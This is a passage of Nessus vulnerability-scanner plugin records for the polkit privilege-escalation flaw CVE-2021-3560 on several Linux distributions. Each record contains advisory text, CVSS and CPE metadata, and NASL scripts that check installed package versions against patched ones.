CGSL host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version MAIN 6.02, has polkit packages installed that are affected by a\nvulnerability:\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests,\n elevating the privileges of the requestor to the root user. 
This flaw could be used by an unprivileged\n local attacker to, for example, create a new local administrator. The highest threat from this\n vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2022-0061\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2021-3560\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL polkit packages. Note that updated packages may not be available yet. Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:polkit\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:zte:cgsl_main:polkit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:polkit-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:polkit-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:zte:cgsl_main:6\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL MAIN 6.02\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL MAIN 6.02');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nvar flag = 0;\n\nvar pkgs = {\n 'CGSL MAIN 6.02': [\n 'polkit-0.115-11.el8_4.1',\n 'polkit-debuginfo-0.115-11.el8_4.1',\n 'polkit-debugsource-0.115-11.el8_4.1',\n 'polkit-devel-0.115-11.el8_4.1',\n 'polkit-docs-0.115-11.el8_4.1',\n 'polkit-libs-0.115-11.el8_4.1',\n 
'polkit-libs-debuginfo-0.115-11.el8_4.1'\n ]\n};\nvar pkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T15:09:29", "description": "According to the versions of the polkit packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-11-17T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.9.0 : polkit (EulerOS-SA-2021-2765)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:polkit", "p-cpe:/a:huawei:euleros:polkit-libs", "cpe:/o:huawei:euleros:uvp:2.9.0"], "id": "EULEROS_SA-2021-2765.NASL", "href": "https://www.tenable.com/plugins/nessus/155507", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155507);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"EulerOS Virtualization 2.9.0 : polkit (EulerOS-SA-2021-2765)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the polkit packages installed, the EulerOS Virtualization installation on the remote host\nis affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests,\n elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged\n local attacker to, for example, create a new local administrator. The highest threat from this\n vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2765\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?953e6b35\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.9.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.9.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.9.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"polkit-0.116-5.h6.eulerosv2r9\",\n \"polkit-libs-0.116-5.h6.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:51:22", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2021:2238 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", 
"cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "RHEL 8 : polkit (RHSA-2021:2238)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "cpe:/o:redhat:rhel_aus:8.4", "cpe:/o:redhat:rhel_aus:8.6", "cpe:/o:redhat:rhel_e4s:8.4", "cpe:/o:redhat:rhel_e4s:8.6", "cpe:/o:redhat:rhel_eus:8.4", "cpe:/o:redhat:rhel_eus:8.6", "cpe:/o:redhat:rhel_tus:8.4", "cpe:/o:redhat:rhel_tus:8.6", "p-cpe:/a:redhat:enterprise_linux:polkit", "p-cpe:/a:redhat:enterprise_linux:polkit-devel", "p-cpe:/a:redhat:enterprise_linux:polkit-docs", "p-cpe:/a:redhat:enterprise_linux:polkit-libs"], "id": "REDHAT-RHSA-2021-2238.NASL", "href": "https://www.tenable.com/plugins/nessus/150293", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:2238. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150293);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"RHSA\", value:\"2021:2238\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"RHEL 8 : polkit (RHSA-2021:2238)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:2238 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's 
self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3560\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:2238\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1961710\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.4\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-libs\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 
# repository-relative URL entries omitted\n ],\n 'pkgs': [\n {'reference':'polkit-0.115-11.el8_4.1', 
'sp':'4', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'sp':'4', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_4.1', 'sp':'4', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'sp':'4', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n },\n {\n 'repo_relative_urls': [\n 
# repository-relative URL entries omitted\n ],\n 'pkgs': [\n {'reference':'polkit-0.115-11.el8_4.1', 'sp':'6', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'sp':'6', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_4.1', 'sp':'6', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'sp':'6', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n },\n {\n 'repo_relative_urls': [\n 
# repository-relative URL entries omitted\n ],\n 'pkgs': [\n {'reference':'polkit-0.115-11.el8_4.1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_4.1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if 
(!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit / polkit-devel / polkit-docs / polkit-libs');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:51:38", "description": "This update for polkit fixes the following issues :\n\nCVE-2021-3560: Fixed a local privilege escalation using polkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : polkit (SUSE-SU-2021:1844-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libpolkit0", "p-cpe:/a:novell:suse_linux:libpolkit0-debuginfo", "p-cpe:/a:novell:suse_linux:polkit", "p-cpe:/a:novell:suse_linux:polkit-debuginfo", "p-cpe:/a:novell:suse_linux:polkit-debugsource", "p-cpe:/a:novell:suse_linux:polkit-devel", "p-cpe:/a:novell:suse_linux:polkit-devel-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-polkit", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2021-1844-1.NASL", "href": "https://www.tenable.com/plugins/nessus/150270", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2021:1844-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150270);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"SUSE SLES15 Security Update : polkit (SUSE-SU-2021:1844-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for polkit fixes the following issues :\n\nCVE-2021-3560: Fixed a local privilege escalation using\npolkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE 
security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1186497\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3560/\");\n # https://www.suse.com/support/update/announcement/2021/suse-su-20211844-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?812de0ab\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Manager Server 4.0 :\n\nzypper in -t patch\nSUSE-SLE-Product-SUSE-Manager-Server-4.0-2021-1844=1\n\nSUSE Manager Retail Branch Server 4.0 :\n\nzypper in -t patch\nSUSE-SLE-Product-SUSE-Manager-Retail-Branch-Server-4.0-2021-1844=1\n\nSUSE Manager Proxy 4.0 :\n\nzypper in -t patch SUSE-SLE-Product-SUSE-Manager-Proxy-4.0-2021-1844=1\n\nSUSE Linux Enterprise Server for SAP 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-SP1-2021-1844=1\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2021-1844=1\n\nSUSE Linux Enterprise Server 15-SP1-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-SP1-LTSS-2021-1844=1\n\nSUSE Linux Enterprise Server 15-SP1-BCL :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-SP1-BCL-2021-1844=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2021-1844=1\n\nSUSE Linux Enterprise High Performance Computing 15-SP1-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-SP1-LTSS-2021-1844=1\n\nSUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-SP1-ESPOS-2021-1844=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS 
:\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2021-1844=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2021-1844=1\n\nSUSE Enterprise Storage 6 :\n\nzypper in -t patch SUSE-Storage-6-2021-1844=1\n\nSUSE CaaS Platform 4.0 :\n\nTo install this update, use the SUSE CaaS Platform 'skuba' tool. I\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpolkit0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpolkit0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-debugsource\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-Polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 